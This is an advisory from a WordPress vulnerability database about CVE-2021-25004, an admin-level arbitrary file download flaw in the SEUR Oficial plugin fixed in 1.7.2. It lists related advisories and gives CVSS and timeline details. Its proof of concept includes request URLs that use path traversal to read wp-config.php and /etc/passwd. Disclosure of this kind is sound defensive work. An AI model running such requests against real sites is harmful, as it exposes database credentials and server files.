WordPress Plugin Vulnerabilities

SEUR Oficial < 1.7.2 - Admin+ Arbitrary File Download

Description

The plugin creates a PHP file with a random name when installed, even though it is used for support purposes, it allows to download any file from the web server without restriction after knowing the URL and a password than an administrator can see in the plugin settings page.

Proof of Concept

Navigate to /wp-admin/admin.php?page=seur_status_page and grab the URL for the "Seur Download File URL" (seur-downloader-[random code].php) along with the "Seur Download Password"

Then just download any file you want via the following URL: 
* /wp-content/seur-downloader-[random code].php?label=../wp-config.php&label_name=../wp-config.php&pass=[password]

https://example.com/wp-content/seur-downloader-pgu8yjyt0a.php?label=/etc/passwd&label_name=/etc/passwd&pass=3fifyypfm5

Affects Plugins

Plugin icon
seur
Fixed in 1.7.2

References

CVE
CVE-2021-25004

Classification

Type
FILE DOWNLOAD
OWASP top 10
A1: Injection
CWE
CWE-552
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
José Aguilera
Submitter
José Aguilera
Submitter website
https://jsgm.dev
Verified
Yes
WPVDB ID
cfbc2b43-b8f8-4bcb-a3d3-39d217afa530

Timeline

Publicly Published
2022-01-10 (about 2 years ago)
Added
2022-01-10 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)

Other

Published
Title
Published
2023-06-12
Title
wpForo Forum < 2.1.8 - Subscriber+ Arbitrary File Read, Author+ PHAR Deserialization, and Subscriber+ Server-Side Request Forgery via file_get_contents
Published
2022-11-28
Title
Wholesale Market for WooCommerce < 1.0.7 - Unauthenticated Arbitrary File Download
Published
2022-07-11
Title
Project Source Code Download <= 1.0.0 - Unauthenticated Backup Download
Published
2023-01-31
Title
Correos Oficial <= 1.3.0.0 - Unauthenticated Arbitrary File Download
Published
2023-07-20
Title
Jupiter X Core <= 2.5.0 - Unauthenticated Arbitrary File Download